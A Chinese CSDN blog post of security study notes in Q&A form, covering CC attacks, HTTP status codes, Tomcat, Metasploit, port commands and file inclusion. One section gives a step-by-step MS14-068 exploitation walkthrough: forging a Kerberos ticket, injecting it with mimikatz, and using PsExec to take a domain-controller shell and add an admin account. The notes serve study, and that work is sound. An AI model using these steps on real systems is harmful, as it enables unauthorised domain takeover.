网络安全涉及到的知识积累(3)

最新推荐文章于 2024-06-02 11:15:53 发布
最新推荐文章于 2024-06-02 11:15:53 发布
阅读量5.6k 收藏
点赞数
分类专栏: 网络安全问题积累 文章标签: web安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52556798/article/details/124008845
版权

什么是CC攻击?
CC 攻击就是 DDOS 攻击的一种攻击类型。CC 攻击是它的一种攻击方式。
CC 攻击模拟多个用户(多少线程就是多少用户)不停地进行访问(访问那些需要大 量数据操作,就是需要大量 CPU 时间的页面).这一点用一个一般的性能测试软件 就可以做到大量模拟用户并发。CC 攻击的原理就是攻击者控制某些主机不停地 发大量数据包给对方服务器造成服务器资源耗尽,一直到宕机崩溃。
CC攻击主要针对网页攻击,持续时间长

http和https的区别?
HTTP:是互联网上应用最为广泛的一种网络协议,是一个客户端和服务器端请求和应答的标准(TCP)
用于从服务器传输超文本到本地浏览器的传输协议,它可以使浏览器更加高效,使网络传输减少。
HTTPS:是以安全为目标的HTTP通道,简单讲是HTTP的安全版,即HTTP下加入SSL层,HTTPS的安全基础是SSL,因此加密的详细内容就需要SSL

HTTP 请求响应常见状态码
100~199:表示成功接收请求,要求客户端继续提交下一次请求才能完成整个处理过程。
200~299:表示成功接收请求并已完成整个处理过程。常用200
300~399:为完成请求,客户需进一步细化请求。例如:请求的资源已经移动一个新地址、常用302(意味着你请求我,我让你去找别人),307和304(我不给你这个资源,自己拿缓存)
400~499:客户端的请求有错误,常用404(意味着你请求的资源在web服务器中没有)403(服务器拒绝访问,权限不够)
500~599:服务器端出现错误,常用500

waf中为什么要设置爬虫的白名单?
爬虫白名单的存在是为了让网站能够正常的被收录, 若是将这些爬虫引擎拦截的话,可能会造成网站收入过低、权重、流量等等。

tomcat目录结构包括哪些文件?
bin:二进制可执行文件,例如startup.bat和shutdown.bat
conf:配置文件,例如:server.xml、context.xml、web.xml、tomcatusers.xml
lib:tomcat所需jar包
logs:日志文件
temp:存放tomcat运行时产生的临时文件,当tomcat关闭后,这个目录中的文件可以删除
webapps:这个目录下的每个文件夹对应一个JavaWeb应用程序
work:webapps下的应用程序在运行时会自动生成文件,就在work目录下。work目录删除了也没问题,但再次运行应用程序还要再生成work目录和文件。

什么是msf?
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

什么是MS14-068漏洞
允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。
也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变成域管理员权限,然后该域用户就可以控制整个域的所有机器了。
漏洞利用思路?
1、首先利用ms14-068提权工具生成伪造的kerberos协议认证证书(黄金票据)
2、利用mimikatz.exe将证书写入,从而提升为域管理员 3、测试是否能访问域控C盘目录,能访问则说明提升为域管理员
4、利用PsExec.exe获取域控shell,添加用户并将其加入域管理员组
利用过程:
首先得到该用户的SID
whoami /user
利用工具生成票据
ms14-068.exe -u win7@MIKASA.com -s sid -d WIN-Q1E9PO4969I.mikasa.com
-u 域用户名@域名 -s 域用户SID名 -d 域控主机名
之后输入域用户的明文密码就生成了票据
提升权限
klist purge //清除原来的票据,留下一个干净的空间
mimikatz.exe “kerberos::ptc 票据的路径” “exit”
只有可以使用 net use \域控名\C$尝试访问域控

常见数据库端口号?
MySQL: 3306
SQL Server: 1433
Oracle: 1521

linux查看端口?
方法一:
1.先用ps -ef | grep xxx(某个进程),可以查看某个进程的pid。
2.再用netstat -anp | grep pid号,可以查看到该进程占用的端口号!
方法二:
直接用lsof命令可以查看端口使用情况!
Windows查看端口?
查找所有运行的端口
netstat -ano
查看被占用端口对应的 PID
netstat -aon|findstr “port”
查看指定 PID 的进程
tasklist|findstr “pid”
结束进程
强制(/F参数)杀死 pid 为 9088 的所有进程包括子进程(/T参数):
taskkill /T /F /PID 9088

什么是文件包含?
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,
而无需再次编写,这中文件调用的过程一般被称为文件包含。
本地文件包含漏洞
本地包含顾名思义,就是在网站服务器本身存在恶意文件,然后利用本地文件包含使用
远程文件包含漏洞
远程文件包含就是调用其他网站的恶意文件进行打开

我是李现大王
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于贝叶斯算法的网络安全评估模型研究
04-16
网络安全评估涉及两个方面,即技术和管理。评估中存在大量不确定性,无法完全量化。因此,很难实现完全客观的网络信息安全风险评估。为此,该文提出了一种基于贝叶斯算法的网络安全评估模型,以分析和量化由各种威胁...
运维视角的网络安全概念整理.docx
05-08
内容概要:从运维视角总结介绍了企业实际工作中涉及网络安全基本概念。 适合人群:该文档适用于从事运维和网络安全行业...其他说明:企业网络安全运维是庞杂的工作,要学习了解的知识点非常多,重在平时学习和积累
网络安全涉及到的知识积累(1)
m0_52556798的博客
03-10 3935
这些都是我在学习网安的过程中遇到的问题,都是一些比较基础的问题, 比如说哈,我上次愚安笔试题:php弱类型可能会引发哪些问题?那我不知道什么是php弱类型,就先去解决这个问题,最后记录下来,我发现这种方式学习还不错,可以借鉴 什么是php弱类型? php并不会验证变量的类型,可以随时的转换类型, php在大量内置函数以及基本结构中使用了很多松散的比较和转换, 防止程序中的变量因为程序员的不规范而报错,虽然提升了效率,但是引发了很多安全问题。 什么叫做WebShell ? WebShell , 简称网页后门。
网络安全涉及到的知识积累(2)
m0_52556798的博客
03-20 4165
来咯,第二次积累汇总! 什么是redis? redis是一个高性能的key value 的键值对存储数据库,他支持存储的value有以下5中类型: String、hset、list、set、zset 什么是中间件? 从硬件技术看,CPU速度越来越高,处理能力越来越强;从软件技术看,应用程序的规模不断扩大,特别是Internet及WWW的出 现,使计算机的应用范围更为广阔, 许多应用程序需在网络环境的异构平台上运行。在这种分布异构环境中,通常存在多种硬件系统平台(如PC,工作站,小型机等), 在这些硬件平台上
网络安全涉及到的知识积累(5)
m0_52556798的博客
06-07 1604
1.bp里的raw、params、headers、hex几个格式分别表示什么? Raw:web请求的raw格式,包含请求地址、http协议版本、主机头、浏 览器信息、Accept可接受的内容类型、字符集、编码方式、cookie等。我们可以手工去修改这些信息,对服务器端进行渗透测试。 params:客户端请求的参数信息、包括GET或者POST请求的参数、 Cookie参数。渗透人员可以通过修改这些请求参数来完成对服务器端的渗透测试。 headers:与Raw显示的信息类似,只是在这里面展示得更直观。 Hex:
网络安全基础知识面试题库
Algo_x的博客
03-06 1万+
1.基于路由器的攻击手段 源IP地址欺骗式攻击 入侵者从外部传输一个伪装成来自内部主机的数据包(数据包的IP是内网的合法IP) 丢弃所有来自路由器外端口,却使用内部源地址的数据包 源路由攻击 入侵者让数据包循着一个对方不可预料的路径到达目的地,以逃避安全系统的审核 丢弃所有包含源路由选项的数据包 源路由 是指在数据包中还要列出所要经过的路由。某些路由器对源路由包的反应是使用其指定的路由,并使用其反向路由来传送应答数据。这就使一个***者可以 假冒一个主机的名义通过一个特殊的路径来获得某...
网络安全技术发展方向与趋势研究
专注网络安全,聚焦数据安全。
11-13 4006
摘要:随着新一代信息技术与经济社会发展各领域深度融合,网络安全形势日益严峻,网络安全技术在维护国家安全、支撑产业转型、服务社会发展、保护公众利益等方面的重要作用愈加凸显。本文开展了面向2035年的网络安全技术预见,综合运用愿景分析、需求分析、前沿分析、相关研究成果分析等方法,总结凝练密码技术、数据安全、内容安全等7个子领域的60项网络安全领域关键技术,通过两轮德尔菲调查筛选出10项网络安全领域优先技术方向。面向全球网络安全技术发展新态势新趋势和我国经济社会发展新要求,提出了加快推动我国网络安全技术发展的建议
网络安全事件应急演练方案
千寻的博客
12-05 9702
( 1)检验预案。通过开展应急演练,查找应急预案中存在的问题,进而完善应急预案, 提高应急预案的实用性和可操作性。 ( 2)完善准备。通过开展应急演练,检查应对网络安全事件所需应急队伍、物资、装 备、技术等方面的准备情况,发现不足及时予以调整补充,做好应急准备工作。 (3)锻炼队伍。通过开展应急演练,增强演练组织单位、参与单位和人员等对应急预 案的熟悉程序,加强配合,提高其应急处置能力。 ( 4)磨合机制。通过开展应急演练,进一步明确相关单位和人员的职责任务,理顺工 作关系,完善各关联方之间分离、阻隔、配套
网络安全专业名词解释
热门推荐
qq_40909772的博客
03-04 1万+
Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互,作名词解.
网络安全售前工程师需要具备哪些能力?
weixin_45691690的博客
07-02 6373
网络安全售前工程师需要具备哪些能力? 一张思维导图即可一目了然 售前工程师在项目前配合销售拿单提供技术支持,需要了解公司,公司产品,技术框架等细节,同时还需要了解行业竞争对手产品,各自的优劣势,就公司产品和同行产品有个公平客观的评价和介绍。 售前工程师和项目经理的配合,在项目前期对用户关注需求或痛点,要结合公司产品实际能力,给出最佳解决方案,不夸大,不虚承若,细节做到位,做到真诚。不为项目中标后实施过程留下坑,确保项目能顺利验收。    1、具备一定的产品知识 熟悉公司本身的技术状态,包括技术团队能力、项
信息安全工程师(中级)—重要知识点总结
1ance's blog
11-02 1万+
中级信息安全工程师重要知识点;软考。
网络安全调研报告.docx
06-10
3、进一步扩大对网络安全知识培训面,组织信息员和干部职工进行培训,切实增强网络 安全制度的落实工作,不定期的对安全制度执行情况进行检查,从而提高人员安全防护意 识。4、对网络信息使用重点部门主要负责人...
网络安全技术课程标准.doc
06-09
"课程目 "职业能力目标 " "标 " " "知识目 "掌握网络安全的意义和特征 " "标 " " " "掌握网络安全的主要技术 " " "掌握网络安全受到的威胁和解决对策 " " "了解网络安全法律法规 " " "学习体会IT企业规范化、专业化...
渗透测试之Web安全系列教程(一)
最新发布
fearhacker的专栏
06-02 607
script 标签 的 src 属性,指向跨域脚本的URL地址!如果客户端,是我们自己编制的浏览器,或者是自己编制的可以解析网页内容的脚本,那么,我们是可以突破同源策略限制的!由于 浏览器的同源策略,并没有对 script 等标签进行同源限制,这导致了 恶意黑客 可以利用这一特性,并通过一些 Web 网站中所存在的XSS注入漏洞,将一些恶意的代码(包含 script 相关内容,而 script 的 src 属性的值,可能是指向某个其它域的、包含木马脚本的URL地址)内容嵌入到 Web 网站的指定页面中。
网络安全VIP>第一篇《工业互联网安全
Else 的博客
05-28 968
工业互联网的网络是基础,平台是核心,安全是保障。信息化会提高工业化的生产效率,但信息化本身具备两面性。一方面它可以让信息交互更加顺畅,共享更加快捷;但另一方面是带来相应的安全威胁。
HFish蜜罐实践:网络安全防御的主动出击
weixin_43822401的博客
05-29 622
HFish蜜罐作为一种主动防御工具,通过模拟易受攻击的服务,吸引攻击者,不仅能有效捕获攻击行为,还能为安全分析和溯源提供宝贵信息。HFish蜜罐作为一种先进的网络安全防御工具,不仅能够有效地捕获和分析攻击行为,还能为安全专家提供攻击溯源的重要线索。为每个节点配置蜜罐服务,如FTP、SSH、Telnet等,这些服务作为诱饵,用于吸引并捕获攻击者的行为。收集所有连接和攻击节点的IP信息,通过分析这些信息,刻画攻击者画像,构建私有情报库。利用攻击者使用的工具漏洞,进行信息提取和溯源,确定攻击者的身份和来源。
网络安全等级保护,三级等保技术建议书(word原件获取)
2302_79423711的博客
06-02 259
本文末个人名片直接获取所有资料。
CTF网络安全大赛简单的web抓包题目:HEADache
Pythonit教程网
05-20 1118
题目 描  述: > Wanna learn about some types of headache?红客网:blog.hongkewang.cn。”,就能获取到flag,完成题目了。直接在抓包到的页面添加请求头“题目来源于:bugku。
详细说一下零基础学习网络安全的方式和具体内容
05-21
2. 学习操作系统和编程语言:网络安全涉及到操作系统和编程语言方面的知识,建议学习Linux系统和Python编程语言。 3. 学习加密技术:学习加密技术是网络安全的基础,了解加密算法、数字证书、SSL/TLS等知识,能够...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值